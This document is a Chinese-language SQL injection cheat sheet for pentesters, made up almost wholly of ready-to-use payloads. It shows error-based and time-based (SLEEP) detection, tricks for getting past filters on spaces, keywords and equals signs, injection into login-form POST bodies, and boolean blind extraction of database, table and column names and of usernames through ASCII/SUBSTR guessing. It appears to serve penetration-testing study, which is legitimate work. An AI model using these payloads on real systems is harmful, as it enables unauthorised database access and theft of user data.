# 字符型显注测试：若页面报错（如MySQL语法错误），则为显注；无报错则进入盲注判断
?id=1' 

# 数字型显注测试：若页面直接显示“无数据”但无报错，进入盲注判断
?id=1 and 1=2

# 空格绕过：/**/、()、Tab（%09）
?id=1')AND(1=1--+  # 括号替代空格
?id=1'%20AND%201=1--+  # URL编码空格
?id=1'/**/AND/**/1=1--+  # 注释符替代空格

# 关键字绕过：大小写、双写、替代符
?id=1' aNd 1=1 --+  # 大小写
?id=1' ANANDD 1=1 --+  # 双写
?id=1' && 1=1 --+  # &&替代AND（MySQL）
?id=1' || 1=1 --+  # ||替代OR（MySQL）

# 等号绕过：LIKE、REGEXP
?id=1' AND 1 LIKE 1 --+
?id=1' AND 'a' REGEXP '^a' --+

# POST体示例（Burp抓包修改）
username=admin' AND 1=1 --+&password=123  # 恒真→登录页面提示“用户名错误”（正常状态）
username=admin' AND 1=2 --+&password=123  # 恒假→登录页面提示“系统错误”（异常状态）

# 无意义条件（页面应无变化）
?id=1' AND 'a'='a --+  # 恒真，页面正常
?id=1' AND 'a'='b --+  # 恒假，页面异常
# 若状态稳定，说明是SQL条件导致的状态变化，而非页面随机问题

# 时间盲注测试：页面延迟5秒响应则为时间盲注，否则无盲注
?id=1' AND SLEEP(5) --+
# 若页面无延迟，且基础布尔条件也无状态差异→无布尔注入

# 恒真→页面显示“用户ID:1”
http://test.com/index.php?id=1' AND 1=1 --+
# 恒假→页面显示“无此用户”
http://test.com/index.php?id=1' AND 1=2 --+

# 猜解当前数据库名长度
http://test.com/index.php?id=1' AND LENGTH(database())=6 --+
# 页面正常→确认数据库名长度为6

# 猜解数据库名第1个字符（ASCII=116→'t'）
http://test.com/index.php?id=1' AND ASCII(SUBSTR(database(),1,1))=116 --+
# 页面正常→确认第1个字符为't'

# 猜解表名（testdb库下第1个表）
http://test.com/index.php?id=1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='testdb' LIMIT 0,1),1,1))=117 --+

# 猜解列名（users表下第1个列）
http://test.com/index.php?id=1' AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='testdb' AND table_name='users' LIMIT 0,1),1,1))=117 --+

# 猜解数据（users表中username列第1条数据）
http://test.com/index.php?id=1' AND ASCII(SUBSTR((SELECT username FROM users LIMIT 0,1),1,1))=97 --+

# 验证存在性
?id=1' AND 1=1 --+  # 真→正常
?id=1' AND 1=2 --+  # 假→异常

# 猜解数据库名长度
?id=1' AND LENGTH(database())=N --+

# 逐字符猜解
?id=1' AND ASCII(SUBSTR(database(),M,1))=X --+

# 验证存在性
?id=1 AND 1=1  # 真→正常
?id=1 AND 1=2  # 假→异常

# 猜解长度
?id=1 AND LENGTH(database())=N

# 逐字符猜解
?id=1 AND ASCII(SUBSTR(database(),M,1))=X

# 登录表单（username参数）
username=admin' AND 1=1 --+&password=123  # 真→提示“密码错误”
username=admin' AND 1=2 --+&password=123  # 假→提示“用户名不存在”

# AND被过滤→用&&
?id=1' && 1=1 --+

# 空格被过滤→用/**/
?id=1'/**/AND/**/1=1--+

# 等号被过滤→用LIKE
?id=1' AND ASCII(SUBSTR(database(),1,1)) LIKE 116 --+